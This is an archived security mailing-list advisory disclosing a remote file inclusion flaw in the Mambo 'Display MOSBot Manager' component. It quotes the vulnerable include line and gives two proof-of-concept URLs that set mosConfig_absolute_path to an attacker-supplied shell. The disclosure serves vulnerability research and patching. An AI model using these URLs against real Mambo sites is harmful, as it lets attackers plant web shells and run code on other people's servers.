Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



		###########################################################################################
		#			Aria-Security.net Advisory                                        #
		#			Discovered  by: O.U.T.L.A.W                                       #			#			< www.Aria-security.net >                                      	  #
		#		Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                      	  #
		#		                                  		    			  #
		###########################################################################################


#Software: Mambo Component - Display MOSBot Manager
#Attack method: Remote File Inclusion 	
#Source:

#include_once( "".$mosConfig_absolute_path."/administrator/components/". $component_directory ."/toolbar.". 

************************************************************************************

 											  
#Proof of Concept:								   	  
#http://www.site.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell
#http://www.site.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell	
#----------------------------------------------------------                               
#               									  										  
#										                  
#Contact : Outlaw@xxxxxxxxxxxxxxxxx                                                       
                                                                                         



[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux